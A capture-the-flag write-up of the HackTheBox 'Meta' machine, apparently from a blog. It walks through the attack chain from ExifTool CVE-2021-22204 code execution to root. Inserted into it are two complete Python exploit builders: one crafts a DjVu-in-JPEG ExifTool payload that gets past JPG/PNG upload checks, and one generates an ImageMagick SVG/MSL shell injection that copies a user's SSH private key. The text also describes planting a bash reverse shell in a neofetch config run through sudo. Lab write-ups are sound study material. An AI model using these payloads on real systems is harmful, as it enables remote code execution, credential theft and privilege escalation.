🔎🦶 Enumeration/Foothold

Meta from HTB, created by Nauten, is a Medium machine with a focus on CVE-2021-22204 (arbitrary code execution in ExifTool through a crafted DjVu annotation). You start the box by finding a hidden ‘development’ sub-domain, dev01, that hosts an exploitable exiftool application. You use CVE-2021-22204 for a shell on the box. Once on the box you exploit mogrify to elevate to the local user and a neofetch config for root.

Navigating to 10.10.11.140 on port 80 shows a redirect to the domain artcorp.htb, so I add it to my hosts file:


On the artcorp.htb website I see a mention of Development and a ‘testing phase’.

Website shows Development and 'testing phase'.


I kick off ffuf to fuzz for possible sub-domains and gobuster for a VHOST scan. ffuf comes back with a hit:


I add the sub-domain to my hosts file and navigate over. I see a MetaView application that lets you upload files to view their metadata:

Mentions displaying metadata and JPG/PNG requirement.


⚠ Attack Machine


I change lines 6-7 of the exploit, create the malicious image file and upload it to the host:
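As an added example (not the exploit script used in the post, and not Nauten's or ExifTool's code), here is a standalone Python builder for the kind of file such scripts produce: a DjVu whose annotation chunk carries a Perl payload that vulnerable ExifTool evaluates. It assumes the server-side exiftool is in the affected range (7.44 through 12.23), that the MetaView upload reaches exiftool unchanged, and that you have an existing JPEG to wrap the DjVu in; the marker command, file names and paths are constructed placeholders.

```python
"""Craft a DjVu file whose annotation carries a Perl payload for ExifTool (CVE-2021-22204).

Added example, not the exploit script used in the post. It assumes the server runs an
ExifTool in the affected range (7.44 through 12.23) and that uploads reach exiftool
as-is. The wrapper step (copying the DjVu into a JPEG's HasselbladExif tag) is the
documented way past a JPG/PNG-only upload check. Paths and the demo command are
constructed placeholders.
"""
import struct
import sys
from pathlib import Path


def iff_chunk(chunk_id: bytes, data: bytes) -> bytes:
    """IFF85 chunk as DjVu uses it: 4-byte id, big-endian u32 length, data, pad byte if odd."""
    if len(chunk_id) != 4:
        raise ValueError("chunk id must be exactly 4 bytes")
    pad = b"\x00" if len(data) % 2 else b""
    return chunk_id + struct.pack(">I", len(data)) + data + pad


def ant_payload(perl_code: str) -> bytes:
    """Annotation whose quoted string reaches Perl's eval in vulnerable ExifTool.

    Before eval, ExifTool puts a backslash in front of every unescaped '$' to stop
    interpolation. The leading '\\c' escape consumes that inserted backslash ('\\c\\'
    is a valid control-character escape), so '${...}' survives and Perl interpolates
    it, running perl_code. Quotes and backslashes in perl_code are escaped so they
    cannot end the annotation string early.
    """
    if "}" in perl_code:
        raise ValueError("perl_code must not contain '}', it would close the ${...} block")
    escaped = perl_code.replace("\\", "\\\\").replace('"', '\\"')
    return f'(metadata "\\c${{{escaped}}};")'.encode()


def build_djvu(annotation: bytes, width: int = 1, height: int = 1) -> bytes:
    """Minimal single-page DjVu: AT&T magic, FORM:DJVU holding INFO, an empty BGjp and ANTa."""
    # INFO layout: width, height (big-endian u16), version low/high bytes (26 = current
    # DjVu version), dpi (little-endian u16), gamma*10, flags. ExifTool reports but does
    # not validate these, so any sane values work.
    info = struct.pack(">HHBB", width, height, 26, 0) + struct.pack("<H", 300) + bytes([22, 0])
    body = (b"DJVU"
            + iff_chunk(b"INFO", info)
            + iff_chunk(b"BGjp", b"")          # empty background, like BGjp=/dev/null in djvumake
            + iff_chunk(b"ANTa", annotation))  # uncompressed annotation: where ParseAnt looks
    return b"AT&T" + iff_chunk(b"FORM", body)


def iter_chunks(blob: bytes):
    """Yield (id, data) for the chunks inside the FORM, checking the container lengths."""
    if blob[:4] != b"AT&T" or blob[4:8] != b"FORM" or blob[12:16] != b"DJVU":
        raise ValueError("not a single-page DjVu file")
    form_len = struct.unpack(">I", blob[8:12])[0]
    if 12 + form_len > len(blob):
        raise ValueError("FORM length exceeds file size")
    pos, end = 16, 12 + form_len
    while pos + 8 <= end:
        cid = blob[pos:pos + 4]
        length = struct.unpack(">I", blob[pos + 4:pos + 8])[0]
        yield cid, blob[pos + 8:pos + 8 + length]
        pos += 8 + length + (length % 2)


def annotation_of(blob: bytes) -> bytes:
    """Return the ANTa chunk body, i.e. exactly what ExifTool's DjVu parser will evaluate."""
    return next(data for cid, data in iter_chunks(blob) if cid == b"ANTa")


# exiftool -config file: makes the normally read-only HasselbladExif tag (0xc51b) writable.
# When ExifTool later reads the JPEG it extracts that tag's content as an embedded file,
# detects the AT&T magic and runs the DjVu parser on it.
EXIFTOOL_CONFIG = """\
%Image::ExifTool::UserDefined = (
    'Image::ExifTool::Exif::Main' => {
        0xc51b => { Name => 'HasselbladExif', Writable => 'string', WriteGroup => 'IFD0' },
    },
);
1;
"""


def embed_command(djvu: str, jpeg: str, config: str = "eval.config") -> str:
    """Shell command (needs exiftool) that copies the DjVu into an existing JPEG's 0xc51b tag."""
    return f"exiftool -config {config} '-HasselbladExif<={djvu}' {jpeg}"


if __name__ == "__main__":
    # Constructed marker command; swap in your own (anything without a '}' passes the check).
    payload = ant_payload("system('id > /tmp/exiftool_rce')")
    blob = build_djvu(payload)
    assert annotation_of(blob) == payload  # sanity check before uploading anything
    Path("exploit.djvu").write_bytes(blob)
    Path("eval.config").write_text(EXIFTOOL_CONFIG)
    print(embed_command("exploit.djvu", "image.jpg"), file=sys.stderr)
```

Run it, then run the printed exiftool command against a real JPEG and upload the result. ExifTool recognises the DjVu inside the HasselbladExif tag by its AT&T magic, so an extension or magic check that only admits JPG/PNG does not stop it. `annotation_of` also works as a quick triage check on a captured upload: an ANTa chunk containing a `\c${` sequence is the signature of this payload.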

The shell coming back from the malicious image.


🔝 Escalation to Thomas

Once on the host I use LinPEAS with extended flags, which shows convert_images.sh running as a cron job:

⚠ Attack Machine


🎯 Victim Machine


Reviewing the script shows that it runs mogrify against files taken from the convert_images directory:

Checking the mogrify version, I can see that it is indeed vulnerable:


Using Imagemagick – Shell Injection as a reference, I create a malicious .SVG and pull the user's id_rsa:
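An added example, not the post's own file and not ImageMagick project code: a Python generator for the self-referencing SVG/MSL file that the referenced write-up describes, plus a parser-side check that the file is well-formed before it goes into the watched directory. It assumes mogrify is run from the directory the file lands in (the `msl:` reference is a bare filename) and an ImageMagick build that still splices the authenticate value into the Ghostscript delegate command unescaped; the user's home path, the copy destination and the file name are constructed placeholders.

```python
"""Self-referencing SVG/MSL file that turns ImageMagick's PDF delegate into a shell injection.

Added example, not the file used in the post; it follows the shape of the public
'ImageMagick - Shell injection via PDF password' proof of concept the post cites. It
assumes an ImageMagick/mogrify build that still splices the authenticate value into the
Ghostscript delegate command unescaped, and that mogrify runs from the directory the
file is written to (the msl: reference is a bare filename). The exfiltration command,
file names and path are constructed placeholders.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

SVG_NS = "{http://www.w3.org/2000/svg}"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"


def build_msl_svg(command: str, self_name: str = "poc.svg") -> str:
    """Return the payload file contents.

    mogrify opens the file with its SVG coder; the inner <image xlink:href="msl:NAME">
    makes it read the same file again through the MSL (Magick Scripting Language) coder.
    MSL then honours <image authenticate=...> and <read filename="pdf:...">, which calls
    the Ghostscript delegate through /bin/sh with -sPDFPassword="<authenticate>". The
    value below closes that double quote, runs COMMAND in backticks and reopens the quote
    so the rest of the delegate line still parses.
    """
    if '"' in command or "`" in command:
        raise ValueError("command must not contain double quotes or backticks: "
                         "they break the injected shell string")
    # The command sits inside a single-quoted XML attribute: encode the three characters
    # XML would otherwise misread. libxml2 decodes them again before ImageMagick sees them.
    xml_safe = command.replace("&", "&amp;").replace("<", "&lt;").replace("'", "&apos;")
    return (
        f"<image authenticate='ff\" `{xml_safe}`;\"'>\n"
        '  <read filename="pdf:/etc/passwd"/>\n'
        '  <get width="base-width" height="base-height"/>\n'
        '  <resize geometry="400x400"/>\n'
        '  <write filename="test.png"/>\n'
        '  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg"'
        ' xmlns:xlink="http://www.w3.org/1999/xlink">\n'
        f'    <image xlink:href="msl:{self_name}" height="100" width="100"/>\n'
        "  </svg>\n"
        "</image>\n"
    )


def check_payload(doc: str, self_name: str) -> str:
    """Parse the file as XML the way libxml2 will and return the decoded authenticate value.

    Raises if the structure is off, so a typo is caught here rather than as a silent
    mogrify failure in the cron job.
    """
    root = ET.fromstring(doc)
    if root.tag != "image" or root.find("read") is None:
        raise ValueError("outer <image> with a <read> child is missing")
    inner = root.find(f"{SVG_NS}svg/{SVG_NS}image")
    if inner is None or inner.get(XLINK_HREF) != f"msl:{self_name}":
        raise ValueError("inner SVG <image> does not point back at this file via msl:")
    return root.get("authenticate")


def write_payload(directory: str, command: str, name: str = "poc.svg") -> Path:
    """Write the payload where the watched mogrify job will pick it up and return its path."""
    doc = build_msl_svg(command, name)
    check_payload(doc, name)
    target = Path(directory) / name
    target.write_text(doc)
    return target


if __name__ == "__main__":
    # Constructed: copy the user's key somewhere the web user can read it. cp keeps the
    # key's line breaks; the PoC's `echo $(cat file) > out` form collapses them.
    cmd = "cp /home/thomas/.ssh/id_rsa /dev/shm/key; chmod 644 /dev/shm/key"
    print(write_payload(".", cmd))
```

Drop the written file into the directory convert_images.sh processes and wait for the cron run. Copying the key with cp keeps its line breaks; the write-up's `echo $(cat file) > out` pattern collapses them through shell word splitting, which leaves a key that ssh rejects until it is re-wrapped.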

⚠ Attack Machine


🎯 Victim Machine


🔝 Escalation to root

The key I received had some formatting issues, so I cleaned it up (ssh also refuses a key file that is group- or world-readable, so it needs chmod 600) and logged into the box:

⚠ Attack Machine


Once on the box I ran sudo -l to see that neofetch could be run as root. Reviewing the neofetch documentation on neofetch – Config, I tried adding a bash reverse-shell to the config file and executing neofetch as root. This works because neofetch is a bash script that sources its config.conf, so any command placed in that file runs with neofetch's privileges; the thing to check first is that the sudo rule lets you control which config file neofetch loads (for example by keeping XDG_CONFIG_HOME in the environment), otherwise root's own config is read instead of yours:

🎯 Victim Machine


⚠ Attack Machine


The shell came back and I had root:


Rooted

Published On: June 8th, 2022 / Categories: HTB, Technology
